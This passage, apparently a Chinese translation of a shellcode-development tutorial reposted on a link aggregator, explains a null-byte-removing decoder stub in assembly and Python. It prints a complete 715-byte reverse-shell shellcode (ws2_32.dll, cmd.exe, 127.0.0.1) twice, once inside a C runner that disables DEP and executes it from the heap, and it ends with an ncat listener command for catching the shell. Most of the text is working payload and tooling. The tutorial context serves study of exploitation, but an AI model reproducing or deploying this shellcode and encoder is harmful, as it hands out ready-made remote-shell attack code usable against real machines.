  CMOVE EAX, ESI                              ; if AL is the special byte, then EAX = 0
  STOSB                                       ; overwrite the current byte of the shellcode with AL
  LOOP loop1                                  ; DEC ECX; if ECX > 0 then JMP loop1
shellcode_begin:

这里有两个需要重点讨论的细节。首先,该代码不能含有null字节,因为我们需要另一段代码来移除他们

enter image description here

正如你看到的,CALL指令不会跳转到here,因为操作码(opcode

E8 00 00 00 00               #   CALL here

包含四个null字节. 因为CALL 指令为 5个字节, 所以CALL here指令等价于CALL $+5.除去null字节的技巧是使用指令 CALL $+4

E8 FF FF FF FF               #   CALL $+4

那CALL跳过4个字节 并jmp到CALL本身的最后一个FF。由字节C0紧接着CALL指令,因此在CALL指令执行之后该指令INC EAX对应的操作码FF C0会被执行。注意CALL指令中已压入栈的值仍然是here标记的绝对地址

这是除去null字节的第二种技巧:

MOV ECX, XOR ECX,

我们可以只是使用:

MOV ECX,

但是这将不会生成null字节。而实际上,shellcode的长度为0x400,我们将会看到该指令

B9 00 04 00 00 MOV ECX, 400h

存在3个null字节。

为了避免存在该问题,我们选择使用一个不会出现在00000400h中的non-null字节。我们选择使用0x01.现在我们计算如下:

<xor value 1 for shellcode len> = 00000400h xor 01010101 = 01010501h
<xor value 2 for shellcode len> = 01010101h

在指令中使用<xor value 1 for shellcode len> 和 <xor value 2 for shellcode len>对应的操作码都不存在null字节,并且在执行xor操作后,生成的原始值为400h

对应的两条指令将会是:

B9 01 05 01 01        MOV ECX, 01010501h
81 F1 01 01 01 01     XOR ECX, 01010101h

通过函数 get_xor_values来计算xor值。

正如以上提到过的,该代码很容易理解:通过逐字节检查shellcode来用特定的值(0x14,在之前的范例中)覆写null字节。

从shellcode中移除null字节(II)

如上的方法会失败,因为我们不能找到从不在shellcode中出现过的字节值。如果失败了,我们需要使用get_fixed_shellcode,但是它更为复杂。

方法是将shellcode分为多个254字节的块。注意每个块必须存在一个 “missing byte”,因为一个字节可以具有255个非0值。我们可以对每个块进行逐个处理来为每个块选择missing byte。但是这样做可能效率不高,因为对于一段具有254*N个字节的shellcode来说,我们需要在shellcode(存在识别missing bytesdecoder)被处理之前或之后存储N个 “missing bytes”。最有效的做法是,为尽可能多个254字节的块使用相同的“missing bytes”。我们从shellcode的起始部分开始对块进行处理,直到处理完最后一个块。最后,我们会有<missing_byte, num_blocks>配对的列表:

[(missing_byte1, num_blocks1), (missing_byte2, num_blocks2), ...]

我已决定将num_blocksX限制为一个单一字节,因此,num_blocksX 的值会在1到255之间。

此处是get_fixed_shellcode部分,该部分将shellcode分为多个块。

def get_fixed_shellcode(shellcode):
    '''
    Returns a version of shellcode without null bytes. This version divides
    the shellcode into multiple blocks and should be used only if
    get_fixed_shellcode_single_block() doesn't work with this shellcode.
    '''
 
    # The format of bytes_blocks is
    #   [missing_byte1, number_of_blocks1,
    #    missing_byte2, number_of_blocks2, ...]
    # where missing_byteX is the value used to overwrite the null bytes in the
    # shellcode, while number_of_blocksX is the number of 254-byte blocks where
    # to use the corresponding missing_byteX.
    bytes_blocks = []
    shellcode_len = len(shellcode)
    i = 0
    while i < shellcode_len:
        num_blocks = 0
        missing_bytes = list(range(1, 256))
 
        # Tries to find as many 254-byte contiguous blocks as possible which misses at
        # least one non-null value. Note that a single 254-byte block always misses at
        # least one non-null value.
        while True:
            if i >= shellcode_len or num_blocks == 255:
                bytes_blocks += [missing_bytes[0], num_blocks]
                break
            bytes = set([ord(c) for c in shellcode[i:i+254]])
            new_missing_bytes = [b for b in missing_bytes if b not in bytes]
            if len(new_missing_bytes) != 0:         # new block added
                missing_bytes = new_missing_bytes
                num_blocks += 1
                i += 254
            else:
                bytes += [missing_bytes[0], num_blocks]
                break
<snip>

就像之前,我们需要讨论在shellcode起始部分提前准备好的“decoder”。该decoder的代码比之前的更长,但是原理相同。

这里是代码:

code = ([
    0xEB, len(bytes_blocks)] +                          #   JMP SHORT skip_bytes
                                                        # bytes:
    bytes_blocks + [                                    #   ...
                                                        # skip_bytes:
    0xE8, 0xFF, 0xFF, 0xFF, 0xFF,                       #   CALL $ + 4
                                                        # here:
    0xC0,                                               #   (FF)C0 = INC EAX
    0x5F,                                               #   POP EDI
    0xB9, xor1[0], xor1[1], xor1[2], xor1[3],           #   MOV ECX, <xor value 1 for shellcode len>
    0x81, 0xF1, xor2[0], xor2[1], xor2[2], xor2[3],     #   XOR ECX, <xor value 2 for shellcode len>
    0x8D, 0x5F, -(len(bytes_blocks) + 5) & 0xFF,        #   LEA EBX, [EDI + (bytes - here)]
    0x83, 0xC7, 0x30,                                   #   ADD EDI, shellcode_begin - here
                                                        # loop1:
    0xB0, 0xFE,                                         #   MOV AL, 0FEh
    0xF6, 0x63, 0x01,                                   #   MUL AL, BYTE PTR [EBX+1]
    0x0F, 0xB7, 0xD0,                                   #   MOVZX EDX, AX
    0x33, 0xF6,                                         #   XOR ESI, ESI
    0xFC,                                               #   CLD
                                                        # loop2:
    0x8A, 0x07,                                         #   MOV AL, BYTE PTR [EDI]
    0x3A, 0x03,                                         #   CMP AL, BYTE PTR [EBX]
    0x0F, 0x44, 0xC6,                                   #   CMOVE EAX, ESI
    0xAA,                                               #   STOSB
    0x49,                                               #   DEC ECX
    0x74, 0x07,                                         #   JE shellcode_begin
    0x4A,                                               #   DEC EDX
    0x75, 0xF2,                                         #   JNE loop2
    0x43,                                               #   INC EBX
    0x43,                                               #   INC EBX
    0xEB, 0xE3                                          #   JMP loop1
                                                        # shellcode_begin:
])

bytes_blocks是数组:

[missing_byte1, num_blocks1, missing_byte2, num_blocks2, ...]

我们在之前已经讨论过,但是没有配对。

注意代码始于跳过bytes_blocksJMP SHORT指令。为了实现该操作,len(bytes_blocks)必须小于或等于0x7F。但是正如你所看到的,len(bytes_blocks) 也出现在另一条指令中:

0x8D, 0x5F, -(len(bytes_blocks) + 5) & 0xFF,        #   LEA EBX, [EDI + (bytes - here)]

这里要求len(bytes_blocks) 小于或等于0x7F – 5,因此这是决定性的条件。如果条件违规,则:

if len(bytes_blocks) > 0x7f - 5:
# Can't assemble "LEA EBX, [EDI + (bytes-here)]" or "JMP skip_bytes".
return None

进一步审计代码:

JMP SHORT skip_bytes
bytes:
  ...
skip_bytes:
  CALL $ + 4                                  ; PUSH "here"; JMP "here"-1
here:
  (FF)C0 = INC EAX                            ; not important: just a NOP
  POP EDI                                     ; EDI = absolute address of "here"
  MOV ECX, <xor value 1 for shellcode len>
  XOR ECX, <xor value 2 for shellcode len>    ; ECX = shellcode length
  LEA EBX, [EDI + (bytes - here)]             ; EBX = absolute address of "bytes"
  ADD EDI, shellcode_begin - here             ; EDI = absolute address of the shellcode
loop1:
  MOV AL, 0FEh                                ; AL = 254
  MUL AL, BYTE PTR [EBX+1]                    ; AX = 254 * current num_blocksX = num bytes
  MOVZX EDX, AX                               ; EDX = num bytes of the current chunk
  XOR ESI, ESI                                ; ESI = 0
  CLD                                         ; tells STOSB to go forwards
loop2:
  MOV AL, BYTE PTR [EDI]                      ; AL = current byte of shellcode
  CMP AL, BYTE PTR [EBX]                      ; is AL the missing byte for the current chunk?
  CMOVE EAX, ESI                              ; if it is, then EAX = 0
  STOSB                                       ; replaces the current byte of the shellcode with AL
  DEC ECX                                     ; ECX -= 1
  JE shellcode_begin                          ; if ECX == 0, then we're done!
  DEC EDX                                     ; EDX -= 1
  JNE loop2                                   ; if EDX != 0, then we keep working on the current chunk
  INC EBX                                     ; EBX += 1  (moves to next pair...
  INC EBX                                     ; EBX += 1   ... missing_bytes, num_blocks)
  JMP loop1                                   ; starts working on the next chunk
shellcode_begin:

测试脚本

这部分会简明易懂!如果没有任何参数,运行脚本将会显示如下:

Shellcode Extractor by Massimiliano Tomassoli (2015)

Usage:
  sce.py <exe file> <map file>

如果你还记得,我们也已经告诉过VS 2013linker生成一个映射文件。只调用具有exe文件及映射文件路径的脚本。此处是从反向shellcode中得到的信息:

Shellcode Extractor by Massimiliano Tomassoli (2015)

Extracting shellcode length from "mapfile"...
shellcode length: 614
Extracting shellcode from "shellcode.exe" and analyzing relocations...
Found 3 reference(s) to 3 string(s) in .rdata
Strings:
  ws2_32.dll
  cmd.exe
  127.0.0.1

Fixing the shellcode...
final shellcode length: 715

char shellcode[] =
"\xe8\xff\xff\xff\xff\xc0\x5f\xb9\xa8\x03\x01\x01\x81\xf1\x01\x01"
"\x01\x01\x83\xc7\x1d\x33\xf6\xfc\x8a\x07\x3c\x05\x0f\x44\xc6\xaa"
"\xe2\xf6\xe8\x05\x05\x05\x05\x5e\x8b\xfe\x81\xc6\x7b\x02\x05\x05"
"\xb9\x03\x05\x05\x05\xfc\xad\x01\x3c\x07\xe2\xfa\x55\x8b\xec\x83"
"\xe4\xf8\x81\xec\x24\x02\x05\x05\x53\x56\x57\xb9\x8d\x10\xb7\xf8"
"\xe8\xa5\x01\x05\x05\x68\x87\x02\x05\x05\xff\xd0\xb9\x40\xd5\xdc"
"\x2d\xe8\x94\x01\x05\x05\xb9\x6f\xf1\xd4\x9f\x8b\xf0\xe8\x88\x01"
"\x05\x05\xb9\x82\xa1\x0d\xa5\x8b\xf8\xe8\x7c\x01\x05\x05\xb9\x70"
"\xbe\x1c\x23\x89\x44\x24\x18\xe8\x6e\x01\x05\x05\xb9\xd1\xfe\x73"
"\x1b\x89\x44\x24\x0c\xe8\x60\x01\x05\x05\xb9\xe2\xfa\x1b\x01\xe8"
"\x56\x01\x05\x05\xb9\xc9\x53\x29\xdc\x89\x44\x24\x20\xe8\x48\x01"
"\x05\x05\xb9\x6e\x85\x1c\x5c\x89\x44\x24\x1c\xe8\x3a\x01\x05\x05"
"\xb9\xe0\x53\x31\x4b\x89\x44\x24\x24\xe8\x2c\x01\x05\x05\xb9\x98"
"\x94\x8e\xca\x8b\xd8\xe8\x20\x01\x05\x05\x89\x44\x24\x10\x8d\x84"
"\x24\xa0\x05\x05\x05\x50\x68\x02\x02\x05\x05\xff\xd6\x33\xc9\x85"
"\xc0\x0f\x85\xd8\x05\x05\x05\x51\x51\x51\x6a\x06\x6a\x01\x6a\x02"
"\x58\x50\xff\xd7\x8b\xf0\x33\xff\x83\xfe\xff\x0f\x84\xc0\x05\x05"
"\x05\x8d\x44\x24\x14\x50\x57\x57\x68\x9a\x02\x05\x05\xff\x54\x24"
"\x2c\x85\xc0\x0f\x85\xa8\x05\x05\x05\x6a\x02\x57\x57\x6a\x10\x8d"
"\x44\x24\x58\x50\x8b\x44\x24\x28\xff\x70\x10\xff\x70\x18\xff\x54"
"\x24\x40\x6a\x02\x58\x66\x89\x44\x24\x28\xb8\x05\x7b\x05\x05\x66"
"\x89\x44\x24\x2a\x8d\x44\x24\x48\x50\xff\x54\x24\x24\x57\x57\x57"
"\x57\x89\x44\x24\x3c\x8d\x44\x24\x38\x6a\x10\x50\x56\xff\x54\x24"
"\x34\x85\xc0\x75\x5c\x6a\x44\x5f\x8b\xcf\x8d\x44\x24\x58\x33\xd2"
"\x88\x10\x40\x49\x75\xfa\x8d\x44\x24\x38\x89\x7c\x24\x58\x50\x8d"
"\x44\x24\x5c\xc7\x84\x24\x88\x05\x05\x05\x05\x01\x05\x05\x50\x52"
"\x52\x52\x6a\x01\x52\x52\x68\x92\x02\x05\x05\x52\x89\xb4\x24\xc0"
"\x05\x05\x05\x89\xb4\x24\xbc\x05\x05\x05\x89\xb4\x24\xb8\x05\x05"
"\x05\xff\x54\x24\x34\x6a\xff\xff\x74\x24\x3c\xff\x54\x24\x18\x33"
"\xff\x57\xff\xd3\x5f\x5e\x33\xc0\x5b\x8b\xe5\x5d\xc3\x33\xd2\xeb"
"\x10\xc1\xca\x0d\x3c\x61\x0f\xbe\xc0\x7c\x03\x83\xe8\x20\x03\xd0"
"\x41\x8a\x01\x84\xc0\x75\xea\x8b\xc2\xc3\x55\x8b\xec\x83\xec\x14"
"\x53\x56\x57\x89\x4d\xf4\x64\xa1\x30\x05\x05\x05\x89\x45\xfc\x8b"
"\x45\xfc\x8b\x40\x0c\x8b\x40\x14\x8b\xf8\x89\x45\xec\x8d\x47\xf8"
"\x8b\x3f\x8b\x70\x18\x85\xf6\x74\x4f\x8b\x46\x3c\x8b\x5c\x30\x78"
"\x85\xdb\x74\x44\x8b\x4c\x33\x0c\x03\xce\xe8\x9e\xff\xff\xff\x8b"
"\x4c\x33\x20\x89\x45\xf8\x03\xce\x33\xc0\x89\x4d\xf0\x89\x45\xfc"
"\x39\x44\x33\x18\x76\x22\x8b\x0c\x81\x03\xce\xe8\x7d\xff\xff\xff"
"\x03\x45\xf8\x39\x45\xf4\x74\x1e\x8b\x45\xfc\x8b\x4d\xf0\x40\x89"
"\x45\xfc\x3b\x44\x33\x18\x72\xde\x3b\x7d\xec\x75\xa0\x33\xc0\x5f"
"\x5e\x5b\x8b\xe5\x5d\xc3\x8b\x4d\xfc\x8b\x44\x33\x24\x8d\x04\x48"
"\x0f\xb7\x0c\x30\x8b\x44\x33\x1c\x8d\x04\x88\x8b\x04\x30\x03\xc6"
"\xeb\xdd\x2f\x05\x05\x05\xf2\x05\x05\x05\x80\x01\x05\x05\x77\x73"
"\x32\x5f\x33\x32\x2e\x64\x6c\x6c\x05\x63\x6d\x64\x2e\x65\x78\x65"
"\x05\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x05";

重点在于重定位信息,因为可以根据它来检查一切是否OK。例如,我们了解到反向shell使用3个字符串来实现,并且它们是从.rdata节中提取的。我们可以了解到原始shellcode为614个字节,同时也了解到已生成的shellcode(在处理了重定向信息以及null字节之后)为715字节。

现在需要运行已生成的shellcode。此处是完整的源码:

#include <cstring>
#include <cassert>
 
// Important: Disable DEP!
//  (Linker->Advanced->Data Execution Prevention = NO)
 
void main() {
    char shellcode[] =
        "\xe8\xff\xff\xff\xff\xc0\x5f\xb9\xa8\x03\x01\x01\x81\xf1\x01\x01"
        "\x01\x01\x83\xc7\x1d\x33\xf6\xfc\x8a\x07\x3c\x05\x0f\x44\xc6\xaa"
        "\xe2\xf6\xe8\x05\x05\x05\x05\x5e\x8b\xfe\x81\xc6\x7b\x02\x05\x05"
        "\xb9\x03\x05\x05\x05\xfc\xad\x01\x3c\x07\xe2\xfa\x55\x8b\xec\x83"
        "\xe4\xf8\x81\xec\x24\x02\x05\x05\x53\x56\x57\xb9\x8d\x10\xb7\xf8"
        "\xe8\xa5\x01\x05\x05\x68\x87\x02\x05\x05\xff\xd0\xb9\x40\xd5\xdc"
        "\x2d\xe8\x94\x01\x05\x05\xb9\x6f\xf1\xd4\x9f\x8b\xf0\xe8\x88\x01"
        "\x05\x05\xb9\x82\xa1\x0d\xa5\x8b\xf8\xe8\x7c\x01\x05\x05\xb9\x70"
        "\xbe\x1c\x23\x89\x44\x24\x18\xe8\x6e\x01\x05\x05\xb9\xd1\xfe\x73"
        "\x1b\x89\x44\x24\x0c\xe8\x60\x01\x05\x05\xb9\xe2\xfa\x1b\x01\xe8"
        "\x56\x01\x05\x05\xb9\xc9\x53\x29\xdc\x89\x44\x24\x20\xe8\x48\x01"
        "\x05\x05\xb9\x6e\x85\x1c\x5c\x89\x44\x24\x1c\xe8\x3a\x01\x05\x05"
        "\xb9\xe0\x53\x31\x4b\x89\x44\x24\x24\xe8\x2c\x01\x05\x05\xb9\x98"
        "\x94\x8e\xca\x8b\xd8\xe8\x20\x01\x05\x05\x89\x44\x24\x10\x8d\x84"
        "\x24\xa0\x05\x05\x05\x50\x68\x02\x02\x05\x05\xff\xd6\x33\xc9\x85"
        "\xc0\x0f\x85\xd8\x05\x05\x05\x51\x51\x51\x6a\x06\x6a\x01\x6a\x02"
        "\x58\x50\xff\xd7\x8b\xf0\x33\xff\x83\xfe\xff\x0f\x84\xc0\x05\x05"
        "\x05\x8d\x44\x24\x14\x50\x57\x57\x68\x9a\x02\x05\x05\xff\x54\x24"
        "\x2c\x85\xc0\x0f\x85\xa8\x05\x05\x05\x6a\x02\x57\x57\x6a\x10\x8d"
        "\x44\x24\x58\x50\x8b\x44\x24\x28\xff\x70\x10\xff\x70\x18\xff\x54"
        "\x24\x40\x6a\x02\x58\x66\x89\x44\x24\x28\xb8\x05\x7b\x05\x05\x66"
        "\x89\x44\x24\x2a\x8d\x44\x24\x48\x50\xff\x54\x24\x24\x57\x57\x57"
        "\x57\x89\x44\x24\x3c\x8d\x44\x24\x38\x6a\x10\x50\x56\xff\x54\x24"
        "\x34\x85\xc0\x75\x5c\x6a\x44\x5f\x8b\xcf\x8d\x44\x24\x58\x33\xd2"
        "\x88\x10\x40\x49\x75\xfa\x8d\x44\x24\x38\x89\x7c\x24\x58\x50\x8d"
        "\x44\x24\x5c\xc7\x84\x24\x88\x05\x05\x05\x05\x01\x05\x05\x50\x52"
        "\x52\x52\x6a\x01\x52\x52\x68\x92\x02\x05\x05\x52\x89\xb4\x24\xc0"
        "\x05\x05\x05\x89\xb4\x24\xbc\x05\x05\x05\x89\xb4\x24\xb8\x05\x05"
        "\x05\xff\x54\x24\x34\x6a\xff\xff\x74\x24\x3c\xff\x54\x24\x18\x33"
        "\xff\x57\xff\xd3\x5f\x5e\x33\xc0\x5b\x8b\xe5\x5d\xc3\x33\xd2\xeb"
        "\x10\xc1\xca\x0d\x3c\x61\x0f\xbe\xc0\x7c\x03\x83\xe8\x20\x03\xd0"
        "\x41\x8a\x01\x84\xc0\x75\xea\x8b\xc2\xc3\x55\x8b\xec\x83\xec\x14"
        "\x53\x56\x57\x89\x4d\xf4\x64\xa1\x30\x05\x05\x05\x89\x45\xfc\x8b"
        "\x45\xfc\x8b\x40\x0c\x8b\x40\x14\x8b\xf8\x89\x45\xec\x8d\x47\xf8"
        "\x8b\x3f\x8b\x70\x18\x85\xf6\x74\x4f\x8b\x46\x3c\x8b\x5c\x30\x78"
        "\x85\xdb\x74\x44\x8b\x4c\x33\x0c\x03\xce\xe8\x9e\xff\xff\xff\x8b"
        "\x4c\x33\x20\x89\x45\xf8\x03\xce\x33\xc0\x89\x4d\xf0\x89\x45\xfc"
        "\x39\x44\x33\x18\x76\x22\x8b\x0c\x81\x03\xce\xe8\x7d\xff\xff\xff"
        "\x03\x45\xf8\x39\x45\xf4\x74\x1e\x8b\x45\xfc\x8b\x4d\xf0\x40\x89"
        "\x45\xfc\x3b\x44\x33\x18\x72\xde\x3b\x7d\xec\x75\xa0\x33\xc0\x5f"
        "\x5e\x5b\x8b\xe5\x5d\xc3\x8b\x4d\xfc\x8b\x44\x33\x24\x8d\x04\x48"
        "\x0f\xb7\x0c\x30\x8b\x44\x33\x1c\x8d\x04\x88\x8b\x04\x30\x03\xc6"
        "\xeb\xdd\x2f\x05\x05\x05\xf2\x05\x05\x05\x80\x01\x05\x05\x77\x73"
        "\x32\x5f\x33\x32\x2e\x64\x6c\x6c\x05\x63\x6d\x64\x2e\x65\x78\x65"
        "\x05\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x05";
 
    static_assert(sizeof(shellcode) > 4, "Use 'char shellcode[] = ...' (not 'char *shellcode = ...')");
 
    // We copy the shellcode to the heap so that it's in writeable memory and can modify itself.
    char *ptr = new char[sizeof(shellcode)];
    memcpy(ptr, shellcode, sizeof(shellcode));
    ((void(*)())ptr)();
}

此时需要关闭DEP(Data Execution Prevention)来让该段代码成功地被执行,通过Project→<solution name> Properties 然后在 Configuration Properties下, Linker and Advanced, 将 Data Execution Prevention (DEP) 设为 No (/NXCOMPAT:NO)。因为shellcode将会在堆中被执行,所以开启了DEP会导致shellcode无法被执行。

C++11 (因此需要VS 2013 CTP )标准中介绍了static_assert ,使用如下语句来检查

char shellcode[] = "..."

而不是

char *shellcode = "..."

在第一个案例中,sizeof(shellcode)表示shellcode的有效长度,此时shellcode已经被复制到栈上了。在第二个案例中,sizeof(shellcode) 只是表示指针(i.e. 4)的大小,并且该指针指向在.rdata节中的shellcode

可以打开cmd shell来测试shellcode

ncat -lvp 123

接着运行shellcode并观察它是否被成功执行。


About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK